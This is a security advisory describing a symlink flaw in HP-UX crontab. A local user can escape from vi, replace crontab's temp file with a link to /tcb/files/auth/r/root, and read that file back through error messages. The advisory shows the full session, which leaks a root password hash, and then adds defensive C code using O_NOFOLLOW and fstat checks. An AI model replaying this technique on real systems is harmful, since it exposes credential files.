A vulnerability in crontab allows local users to read arbitrary local files without root privileges or ownership of the file.
Note that not every local user can run crontab; only users listed in the crontab.allow file can.
Credit:
The information has been provided by Kyong-won Cho.
Running crontab with the -e option (crontab -e) starts the vi editor on a temporary file created in /var/tmp/. The file is owned by the current user.
The attack is performed by escaping to a subshell with the '!sh' command in vi, replacing the temporary file in /var/tmp/ with a symbolic link to the target file, and then quitting the editor so that crontab processes the file. The error messages that crontab prints contain the lines of the linked file.
Example:
To display the contents of /tcb/files/auth/r/root:
$ id
uid=101(dubhe) gid=101(swat)
$ uname -s -r
HP-UX B.11.00
$ crontab -e
...
...
~
"/var/tmp/aaaa25923"
### A file named /var/tmp/aaaa25923 is created
~
:!sh
### Exit to a subshell
$ ln -sf /tcb/files/auth/r/root /var/tmp/aaaa25923
$ exit
### Make a symlink and return to vi
[Hit return to continue]
:q!
### Quit vi
root:u_name=root:u_id#0:\
crontab: error on previous line; unexpected character found in line.
:u_pwd=Of2wgf6SCoIbQ:\
crontab: error on previous line; unexpected character found in line.
:u_bootauth:u_auditid#0:\
crontab: error on previous line; unexpected character found in line.
:u_auditflag#1:\
crontab: error on previous line; unexpected character found in line.
:u_pswduser=root:u_suclog#972084495:u_unsuclog#972084492:u_lock@:\
crontab: error on previous line; unexpected character found in line.
:chkent:
crontab: error on previous line; unexpected character found in line.
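
A defensive counterpart to the session above, as an added example that is not from the original advisory or from the HP-UX crontab source: one way a privileged program can reopen a user-edited temporary file without following a link planted at its path. The helper names and the /tmp/cronXXXXXX test paths are hypothetical and constructed, and the code assumes a POSIX.1-2008 system where O_NOFOLLOW is available.

```c
#define _XOPEN_SOURCE 700
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical helper: reopen the temp file after the editor exits.
 * Returns an fd, or -1 if the path is not the user's own regular file. */
int open_edited_file(const char *path, uid_t owner) {
    struct stat st;
    /* O_NOFOLLOW: fail instead of following a symlink planted at path. */
    int fd = open(path, O_RDONLY | O_NOFOLLOW | O_NONBLOCK);
    if (fd < 0) return -1;
    /* fstat the descriptor, not the path, so the checks cannot be raced.
     * Owner and link-count checks also refuse a hard link to another file. */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) ||
        st.st_uid != owner || st.st_nlink != 1) {
        close(fd);
        return -1;
    }
    return fd;
}

/* Constructed cases: 0 = untouched temp file, 1 = symlink swapped in,
 * 2 = hard link added. Returns 1 if accepted, 0 if refused, -1 on setup error. */
int run_case(int kind) {
    char dir[] = "/tmp/cronXXXXXX", tmp[64], other[64];
    if (!mkdtemp(dir)) return -1;
    snprintf(tmp, sizeof tmp, "%s/aaaa", dir);
    snprintf(other, sizeof other, "%s/other", dir);
    int fd = open(kind == 1 ? other : tmp, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd < 0) return -1;
    close(fd);
    if (kind == 1 && symlink(other, tmp) != 0) return -1;
    if (kind == 2 && link(tmp, other) != 0) return -1;
    fd = open_edited_file(tmp, getuid());
    if (fd >= 0) close(fd);
    unlink(tmp); unlink(other); rmdir(dir);
    return fd >= 0;
}

int main(void) {
    printf("plain=%d ", run_case(0));
    printf("symlink=%d hardlink=%d\n", run_case(1), run_case(2));
    return 0;
}
```

In the symlink case the link target is owned by the same user, so the refusal comes from O_NOFOLLOW alone; the ownership and link-count checks are a second layer for targets the user does not own.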